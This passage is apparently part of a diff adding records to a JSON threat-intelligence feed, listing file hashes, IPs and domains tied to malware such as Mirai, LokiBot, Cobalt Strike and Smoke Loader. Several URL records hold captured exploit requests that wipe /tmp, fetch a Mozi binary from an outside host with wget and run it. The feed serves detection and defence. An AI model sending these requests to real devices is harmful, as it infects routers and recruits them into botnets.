"c4bf09c2ac250f259adf788afb287c917b89dda839ed6b0afe707b5fdb6b0a7e" + ], + "malwareList": [ + { + "name": "Metasploit", + "aliases": [ + "MSF" + ] + } + ], + "threatList": null + }, + { + "id": "8dc39f468265c244a6c5a636ce8fd999d59402ca", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272887997768, + "hash": [ + "6ca864a9497cfa7c1051e554bd0e4b85", + "d58406507746bc7546da7030cd0d1884d0fe87ad", + "8c371f725a3f2b47c3fdf6aa1d6f36a8f1009bd7e3e27482db77636575169e9a" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "7efddc4264a802c23ecebeb44ece6974c16d15f0", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272887997995, + "hash": [ + "f4cb4f7a6851e37b7a49efe99d700ebc", + "8480cd9e604facd098b287ce21682960b7342639", + "6e557771a2607aacfeaf5d12dee1ba51b1b4795d941aa52bc45056b3b9f60539" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "cbebdc572b5fad4bee31345aceb48419652af695", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272887998300, + "hash": [ + "165c7a714eeddbbc502dd46416d9ad11", + "eaf07cb52275c928a4daa1253f647ac867eb0543", + "18c7ee7b77e29681023b75fb648715001e48f66fb93508dcc21bd9918ec2b161" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "151d3b357cd8d137e83a24cd573c8670d515eede", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272887998560, + "hash": [ + "3897788dc43eb1b386f6e18ba3cdaab6", + "e852936f0b42c92aece9ec44c89260382c75b8fe", + "c48f091f057a7a229aeb123a7e382a565da9bf30efd8fc20f004f9b006ebe61c" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "238c27a03fd9900c2237a461c3c266585dd31cb1", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272887998809, + "hash": [ + "98caab822f6809c07bfbce5b1d9590b0", + "1268ae13e97e20b535d67593f4c2a33644a906cf", + "630e1dd423feb4af15dacd299d62785b95c7d5035c8b3421063dfce922a2fd3b" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "3b60c7c03e391af588e82a52c4af0eeb09b37a38", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://45.66.100.9/shell?cd+/tmp;rm+-rf+*;wget+http:/103.208.233.145:60443/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272897355463, + "ip": [ + "45.66.100.9" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "eae5bc6cbda8ea907e9a807888d909c6b3424135", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272897355613, + "ip": [ + "103.208.233.145" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5a05df57d0fdbb26740cf1eae3fe6f99da4cb66d", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272939352180, + "ip": [ + "51.158.122.136" + ], + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0541bced46a976ad3e0e37496972f54f507d9f28", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "cfsauetaylorfarmsfloridabe71d6086cff768a4da65e70fd501927.rz-ops.com", + "seqUpdate": 17272939352508, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "dadb46deadde698a90b5596449ec31f36cee69dc", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "gitlab.medicaltech.it", + "url": "https://gitlab.medicaltech.it:443/GponForm/diag_Form?images/", + "seqUpdate": 17272962218020, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "70fa31bd670cc6768c8c49a12236cc8e26849042", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272985774751, + "hash": [ + "a4c1ff107b86f104cffd3031bc2a51aa", + "8c804346c8be0852424579964cd385fe0e0a1901", + "a707ff505eec288970153f8ae9823bc12c6291842f24d2297db723dd8b255c8a" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "89bbd4844ae0ce3e568f0e9c344fdec35f226a18", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273035810963, + "hash": [ + "4b7c9bdfa6dc7e2a71ab0fa1a7e91a1e", + "a13fcef694ded8f2e694f64325dc1d68d0139af4", + "b7e1de93c32e9124c586d00d3039247f4ee859094d215b6c90e16194b987981c" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fa5af0e628918de2bfaf78c33ac4e80eb097dd4b", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273035811325, + "hash": [ + "7d094c5bce6b6f8f1449813fb392cdda", + "a95923432e89bc66baa4f4e318ba82d7041945b7", + "12169841fee5469e2630384f9d9721437848273054dc5e56d33c24c6faf62096" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "80e9d3ae083d572639e8a0f405fd2aab6b71b92e", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273035811539, + "hash": [ + "dcfd9aacae4f3fc8a8189d3db10e6be4", + "40a79f79f72587f1370ee41150cfe521d7c7f4f0", + "15fc81ef32f57816ec299890ce30165cdb839f1225b12b1eea6f6405e6de89d5" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3e9f6d6df2783cc194ca6882f67d2aa96fb27283", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://194.143.143.46/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273079651499, + "ip": [ + "194.143.143.46" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cbef35401ce384bb492dabd38cfce272a11752ad", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273079651572, + "ip": [ + "103.247.52.141" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ddafd6082a607fb763bca1326b63ee2e1af1437a", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://185.186.92.199/shell?cd+/tmp;rm+-rf+*;wget+http:/113.239.209.43:58567/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273079651794, + "ip": [ + "185.186.92.199" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3e2ccc04cfa964dd54c22d8f79c8d2884563d3e1", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273079651927, + "ip": [ + "113.239.209.43" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "d03410b710142194d375582f83acb565bde287eb", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17273115307296, + "ip": [ + "186.155.86.170" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8e0a309878c5e40f4a04ede32750c6768858e266", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-10-18T00:00:00+03:00", + "url": "http://91.241.87.252/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273115307614, + "ip": [ + "91.241.87.252" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "d1ad1a79a4a518ff51ba490dc2819a52efb7bc24", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273115307676, + "ip": [ + "120.86.237.169" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "43cde1b48ad8eb5fde95217839f268ca3debccc1", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273151192518, + "ip": [ + "90.177.191.151" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "53716bbf5b8e31103c56c8a43af8f688cbcdcc93", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://91.241.86.111/shell?cd+/tmp;rm+-rf+*;wget+http:/110.24.36.171:47663/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273151194625, + "ip": [ + "91.241.86.111" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "474a3579197ebe7b9edca9edba6a4b7e048af006", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273151195496, + "ip": [ + "110.24.36.171" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4a4483f8d2b9c65c8cc9c84ec669d43346a58d15", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-10-01T00:00:00+03:00", + "seqUpdate": 17273151199676, + "ip": [ + "219.150.88.234" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5bfdc6fd50ff164d7df49890513fd875b44514e7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273198620157, + "hash": [ + "7f2a32b207a010271cf6215234b7685a", + "fe00fcab47f014e219a6bf69246952019e8e16bc", + "50e6c0b76a24cfd2082fe35cdccd2197c5cc7df87a2e29ebb6eab40135eb3565" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7c8bf9a0e7e2fe0b07a21aa7613d0d6d563ef9b7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273198620486, + "hash": [ + "ee573301079d71a403e017309e94ad51", + "c61885baeef88f012fcd5bc3ca4ea6593136e303", + "4ada819d00b8700daeacbbdc8afdc37f47a9f0efd11dff64c0ceeaede25b9ee0" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3143980569308b8d59c3fa64d39551f6acffe07b", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273198620757, + "hash": [ + "cb3b777dfa7054b788a2c270c0b9a38b", + "9c51dd4ba93ff13f0ce45af5e69f6e55b1525796", + "47febb59292c68e7024fbba365c148fe0758a6cef56212c8d066e3be7b6f6253" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "0f512348683028b3f24122aa99b8e72f84db0909", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273198621040, + "hash": [ + "3f2349f14312448abdcf857f9deb9ab6", + "79ce6cf1de8c65341d6fbe303eb6944f4a157fde", + "769434efbec02d4241947416c8c39782a9fefa4170a0f286370efe99e17a13d2" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6e361ade41543b8450277b0bfbd6480f5bfc5de8", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://185.186.92.29/shell?cd+/tmp;rm+-rf+*;wget+http:/175.10.18.202:60598/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273203288712, + "ip": [ + "185.186.92.29" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "c74244f1c048c943e241a5f8f1d1d461ae4d06dd", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273203289730, + "ip": [ + "175.10.18.202" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7b561b1d003f7facf9e7745cc7cb71a84ba03b6e", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273231552907, + "hash": [ + "cd895eb7d87dce148b8d0882e8a245d0", + "973714d545c11dcba9232949e8f5ab2efe47faad", + "0919da3876fa60365f0e5953e044738294c955c9110978713aad0ba04eea2f32" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "773affccc1bf8a39f2d43cce1521e71032028369", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273231553234, + "hash": [ + "c4d5d6d84dbd1243322ca9ed86964f6e", + "58c9693d71410518926fe192d2b1389ef4a42011", + "4d344d744638acb8c16cb6829e17aea4a8f03963f73efad98885ce2ee0d6f405" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "3e1ea9d0f0a128145e4b05f45ef9793759343597", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273232677864, + "hash": [ + "acbbc52b1e1e1e34c4146f56eaf57a83", + "b8f4bd6eb30dad98087a8d76bd09238bc4e73e7e", + "fe9a8aca6fb501e4f17789d54b948867a0fa9c588773345628fb9a4165c29651" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "0d481af2532b9233212dab32215162058af8c386", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273238837197, + "ip": [ + "112.206.28.249" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b802d3ec8fc388a7094f7623563a2d55990099d6", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273285213276, + "hash": [ + "263e30f0fa99dcd2d41aa58e1fa081c6", + "d204ea73b9308156234635504abdaa5cc9ae8d28", + "ca965f99c2abe45eff63b0fe547ba74aa001fc965425eae8c9fe77b0d7c45ba4" + ], + "malwareList": [ + { + "name": "Cobalt Strike", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7c2e5fb83a4e87fa3b318d55924ab5c6a9c4c358", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273340409979, + "hash": [ + "d8f3c45024394ba14e5cafca1efbc652", + "3ee7e797968e615d0e76a68466b722ff8ebdcc64", + "fa495492a6ee42a9a65fcdb14a75112225c6355daad797af9ba10351a7b2dc1f" + ], + "malwareList": [ + { + "name": "Buran", + "aliases": [ + "Vega", + "Ghost", + "VegaLocker", + "Jamper", + "Jumper", + "Zeppelin ", + "loplup" + ] + } + ], + "threatList": null + }, + { + "id": "2a177f296a5d2ca811631dfc54c4412684411f29", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "https://45.66.100.37:443/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273341593355, + "ip": [ + "45.66.100.37" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a0b197f12f8eed03c805bcf27a786e4dea87dede", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://45.66.100.37/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273341594317, + "ip": [ + "45.66.100.37" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7622133388fb513e56df40b647496e4872372767", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273341595632, + "ip": [ + "27.43.206.192" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8ea6406615f40406de8803b2550398cce1bbc04e", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273358195065, + "ip": [ + "172.86.64.128" + ], + "malwareList": null, + "threatList": [ + { + "name": "Nitrogen", + "title": "Nitrogen - New indicators have been found" + } + ] + }, + { + "id": "79c214e8b6501cb5c67ac3aa0bd583454b7dc1ed", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273368882438, + "hash": [ + "02cba41cdbca2322c909d58e16cccdd1", + "34bfcbbbe7b370e6a56a2fc34107502806cde49c", + "aeca391fe0a4ea479cc91f7709e1571c03d7aa5a179312b837b85c43768da0e8" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3360c6a3810089aedfb1c6887694d1e663789f7b", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "1857685.ru", + "seqUpdate": 17273370246485, + "malwareList": null, + "threatList": [ + { + "name": "Rezet", + "title": "Rezet - New indicators have been found" + } + ] + }, + { + "id": "ae84f5ad9938be2f8a841894eb8926bd73046b1a", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "accouts-verification.ru", + "seqUpdate": 17273370247355, + "malwareList": null, + "threatList": [ + { + "name": "Rezet", + "title": "Rezet - New indicators have been found" + } + ] + }, + { + "id": "43e60d7478ef0699e9caeccbb3c579bc35e12e65", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "296785671.ru", + "seqUpdate": 17273370248063, + "malwareList": null, + "threatList": [ + { + "name": "Rezet", + "title": "Rezet - New indicators have been found" + } + ] + }, + { + "id": "431b34f04b113df6aea7d8ad14a3bc0603c4e3cc", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "users-mail.ru", + "seqUpdate": 17273370248715, + "malwareList": null, + "threatList": [ + { + "name": "Rezet", + "title": "Rezet - New indicators have been found" + } + ] + }, + { + "id": "846aabcfb31bae2b01e88cf2616bc3c072c3f133", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273469197038, + "hash": [ + "a53fe97c6cf28353e40dd13ee1074228", + "89c029c1e6340cf420eff6f847a3c4989b6f7a9e", + "29541ffa1a4a7f21d4f305140ad3b90326ad603d1172f829f768fcbeb8717f34" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6252882f94758b66671f9a601aa863922be1206b", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://91.241.86.106/soap.cgi?service=WANIPConn1", + "seqUpdate": 17273479367859, + "ip": [ + "91.241.86.106" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "828b7b8fcc82062518ece671784ff6ed27ead0b2", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273479369040, + "ip": [ + "59.184.246.55" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "233ff1b280dc6084d423f51dbd07e39c1e3f8fe7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273513486941, + "hash": [ + "72b34e57129effa882c2abe30c0dda8e", + "0c59eac2222805a2a9fc5182bcec48404c52c01c", + "fcebc71a48b833c944a695f4c3254e7ea2afedb0379b526ba85ceee7d7e12013" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "4dd34d6d463ed23a007aa59bf2d88352c0f82a5f", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273514479575, + "hash": [ + "c8fde8fa8468d84b417113a1c85b65ea", + "01cf7d79dd41cc00e02d05d20d4215dffe6982e6", + "9a1197f8a9d4852c98b73f2abbcdfbb3f2334f2902bb7b3406cb7fd661780840" + ], + "malwareList": [ + { + "name": "Cobalt Strike", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5c230ad9bd35d5e217c166255e34cd4a336b3d85", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273514483034, + "hash": [ + "c8fde8fa8468d84b417113a1c85b65ea", + "01cf7d79dd41cc00e02d05d20d4215dffe6982e6", + "9a1197f8a9d4852c98b73f2abbcdfbb3f2334f2902bb7b3406cb7fd661780840" + ], + "malwareList": [ + { + "name": "Cobalt Strike", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "93de2624110157fdeb775bbe21d691e75b405fd8", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://194.143.143.192/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273519480876, + "ip": [ + "194.143.143.192" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "f24962259218e093c4fe3e3bc0b3c0c3e9c301f0", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273519482447, + "ip": [ + "120.86.252.170" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a3483975e9d8ce6daeb9e54fe6cad381cbe1d8e4", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273536561141, + "hash": [ + "fb0737983ee9065b9d21b8b2ce428e77", + "03d9f0baf181896f52c33619e6f45b29d5d5e465", + "55dd84748c88f14c855ee9044a85246594c15a1196d740ca8254045b6695e18c" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "912b970d19744cda339619eb6a7c1b4ce5b26934", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17273561443391, + "hash": [ + "ab88373fd734105eebbed4d6ac6f4435", + "a82c1cee6deee48bc592e912aadd3fb292ecd64e", + "62a701d9b6fc0ef1c74c2f1ac76550012c9aa444ccb6dabdab530945d52633d8" + ], + "malwareList": [ + { + "name": "MyloBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "1e29ab694b84b499145d4dd343ffd1d3ec6b3557", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604058001, + "hash": [ + "7564fc9db09034f49408c33fae34a335", + "c0a49e5e0054673b3cea2a9e279c896eb2ebec27", + "d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "078bd3e8aaae481bbae32cefddeb6cfba6d041f6", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604060781, + "hash": [ + "d3e53eaa4b26ea3661a22b0ceaa73bc8", + "8b2d1591a0d3261df5685c74b8fcdf299949d48b", + "a1ace76bdd012b9ffeaed78b7b6f0e2ab36b4d5f8479a3ca1115280e6ac7b114" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "f5e1065b0464ea6a7b4c9d0d03723448d7e85de7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604064240, + "hash": [ + "acaf7cfa20d76304b9f970ba07595d7e", + "c1930ece54b0a5444ad89bb5028d8b96d8f00220", + "dec46d0d064e84936011b85f9811d730c4aff2df02e27939ecaf9f0134a82e15" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "46ada78c012163198f16f24950c4aa7090f99d22", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604067059, + "hash": [ + "1af917cc1468fd09560d936f86ea3aa9", + "22dfde080f599dfb84f105cae2b6608a7fe2ce2e", + "d1f79248c500e1e0b3874aaaf1a15b8d01894325e5e0f885c3f8e5bf1c91b505" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "04109c9716b1f776ff6272ca28ea4d41658c5efe", + "type": "file", + "dateFirstSeen": 